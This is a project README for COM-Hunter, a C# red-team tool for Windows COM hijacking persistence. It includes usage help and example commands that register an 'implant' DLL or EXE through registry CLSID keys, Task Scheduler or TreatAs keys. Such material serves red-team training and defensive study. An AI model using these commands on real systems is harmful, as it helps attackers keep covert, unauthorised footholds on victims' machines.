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COM Hijacking VOODOO

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COM-Hunter is a COM Hijacking persistnce tool written in C#.

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The following list explains the available modes:

  • Search Mode: Searches for CLSIDs based on LocalServer32, InprocServer32, and registry hives HKLM and HKCU.
  • Classic Persist Mode: Performs classic COM hijacking persistence using LocalServer32 or InprocServer32.
  • Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using LocalServer32 or InprocServer32.
  • TreatAs Mode: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using LocalServer32 or InprocServer32.

If you find any bugs, don’t hesitate to report them. Your feedback is valuable in improving the quality of this project!


The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.

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This project created with ❤️ by @nickvourd && @S1ckB0y1337.

Special thanks to my friend Marios Gyftos for his invaluable assistance during the beta testing phase of this tool.

Inspired by the RTO course from @zeropointsecltd.


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                                   Version: 2.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM-Hunter.exe <mode> <options>

[+] Available Modes:
    search             Search Mode
    persist            Classic Persist Mode
    tasksch            Task Scheduler Mode
    treatas            TreatAs Mode

[+] Search Mode:
Usage:  COM-Hunter.exe search <CLSID> <options>
    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU
    -l, --localserver32         Search EXE implementations in HKLM and HKCU
    -m, --machine               Search DLL and EXE implementations in HKLM
    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:
Usage:  COM-Hunter.exe persist <CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:
Usage:  COM-Hunter.exe tasksch <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] TreatAs Mode:
Usage:  COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation


ℹ️ Search DLL and EXE implementations in HKLM and HKCU:

.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ Search EXE implementations in HKLM and HKCU:

.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ Advanced search EXE implementations in HKLM:

.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ Search EXE and DLL implementations in HKCU:

.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ Perform classic persistence using DLL implementation:

.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ Perform classic persistence using EXE implementation:

.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ Perform persistence via Task Scheduler using DLL implementation:

.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:

.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i



COM Hijacking VOODOO







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  • C# 60.4%
  • C 39.1%
  • Makefile 0.5%